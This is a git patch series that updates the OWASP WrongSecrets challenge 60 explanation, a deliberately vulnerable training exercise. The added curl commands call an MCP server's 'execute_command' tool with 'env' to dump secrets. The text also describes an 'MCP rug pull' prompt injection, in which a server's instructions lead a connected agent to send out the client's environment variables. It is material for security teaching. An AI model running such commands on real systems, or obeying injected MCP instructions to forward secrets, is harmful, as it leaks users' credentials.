From cb53b2538e0d502ac7c0232d98003c898bea16b3 Mon Sep 17 00:00:00 2001 From: Jeroen Willemsen Date: Tue, 10 Mar 2026 09:23:28 +0100 Subject: [PATCH 1/3] update instructions challenge 60 --- .../resources/explanations/challenge60.adoc | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/src/main/resources/explanations/challenge60.adoc b/src/main/resources/explanations/challenge60.adoc index 6a2561ad0..78ec6d324 100644 --- a/src/main/resources/explanations/challenge60.adoc +++ b/src/main/resources/explanations/challenge60.adoc @@ -22,6 +22,16 @@ curl -s -X POST http://localhost:8090/mcp \ -d '{"jsonrpc":"2.0","id":1,"method":"tools/list"}' ---- +_Note_: working from wwww.wrongsecrets.com? Then please use + +[source,bash] +---- +curl -s -X POST https://wrongsecrets.com/mcp \ + -H 'Content-Type: application/json' \ + -d '{"jsonrpc":"2.0","id":1,"method":"tools/list"}' +---- + + Then, call the `execute_command` tool to retrieve environment variables and find the secret: [source,bash] @@ -31,6 +41,16 @@ curl -s -X POST http://localhost:8090/mcp \ -d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"execute_command","arguments":{"command":"env"}}}' ---- +_Note_: working from wwww.wrongsecrets.com? Then please use + +[source,bash] +---- +curl -s -X POST https://wrongsecrets.com/mcp \ + -H 'Content-Type: application/json' \ + -d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"execute_command","arguments":{"command":"env"}}}' +---- + + **** 🤖 *Fun Fact — MCP Prompt Injection ("MCP Rug Pull"):* From 5f961ae1f7faa481ed509b0d97919a68a39c1445 Mon Sep 17 00:00:00 2001 From: Jeroen Willemsen Date: Tue, 10 Mar 2026 09:33:29 +0100 Subject: [PATCH 2/3] updated instructions for using wrongsecrets online --- src/main/resources/explanations/challenge60.adoc | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) diff --git a/src/main/resources/explanations/challenge60.adoc b/src/main/resources/explanations/challenge60.adoc index 78ec6d324..223f9ca87 100644 --- a/src/main/resources/explanations/challenge60.adoc +++ b/src/main/resources/explanations/challenge60.adoc @@ -22,14 +22,16 @@ curl -s -X POST http://localhost:8090/mcp \ -d '{"jsonrpc":"2.0","id":1,"method":"tools/list"}' ---- -_Note_: working from wwww.wrongsecrets.com? Then please use +[%collapsible, title="when working from www.wrongsecrets.com"] +==== [source,bash] ---- -curl -s -X POST https://wrongsecrets.com/mcp \ +curl -s -X POST https://www.wrongsecrets.com/mcp \ -H 'Content-Type: application/json' \ -d '{"jsonrpc":"2.0","id":1,"method":"tools/list"}' ---- +==== Then, call the `execute_command` tool to retrieve environment variables and find the secret: @@ -41,14 +43,17 @@ curl -s -X POST http://localhost:8090/mcp \ -d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"execute_command","arguments":{"command":"env"}}}' ---- -_Note_: working from wwww.wrongsecrets.com? Then please use + +[%collapsible, title="when working from www.wrongsecrets.com"] +==== [source,bash] ---- -curl -s -X POST https://wrongsecrets.com/mcp \ +curl -s -X POST https://www.wrongsecrets.com/mcp \ -H 'Content-Type: application/json' \ -d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"execute_command","arguments":{"command":"env"}}}' ---- +==== **** From 7c66fd77715283923a57a5a729da18ece5eefb6d Mon Sep 17 00:00:00 2001 From: Jeroen Willemsen Date: Tue, 10 Mar 2026 09:34:05 +0100 Subject: [PATCH 3/3] improving instructions part 2: --- src/main/resources/explanations/challenge60.adoc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/explanations/challenge60.adoc b/src/main/resources/explanations/challenge60.adoc index 223f9ca87..adca8cbfc 100644 --- a/src/main/resources/explanations/challenge60.adoc +++ b/src/main/resources/explanations/challenge60.adoc @@ -64,7 +64,7 @@ This MCP server goes one step further than just exposing env vars to passive cal You can try this locally by doing the following: 1. run the container locally (e.g. `docker run -p 8080:8080 -p 8090:8090 ghcr.io/owasp/wrongsecrets/wrongsecrets-pr:pr-2400-7391231`) -2. setup an agent, using the mcp server "http://localhost:8090/mcp" +2. setup an agent, using the mcp server "http://localhost:8090/mcp" (or "https://www.wrongsecrets.com/mcp" if you are ok with leaking online) 3. initialize the agent, and watch the logs of your container saying "MCP forward_env received exfiltrated client env data (XXX chars)", showing the MCP server received your env-vars. This is known as the *MCP rug pull* or *MCP supply chain attack*, and it demonstrates why you should always review the `instructions` field of any MCP server you connect to before trusting it. Next, always make sure you only allow isolated processes without access to secrets to use MCP servers. Never call MCP servers directly from your terminal if sensitive ENV vars or files are present.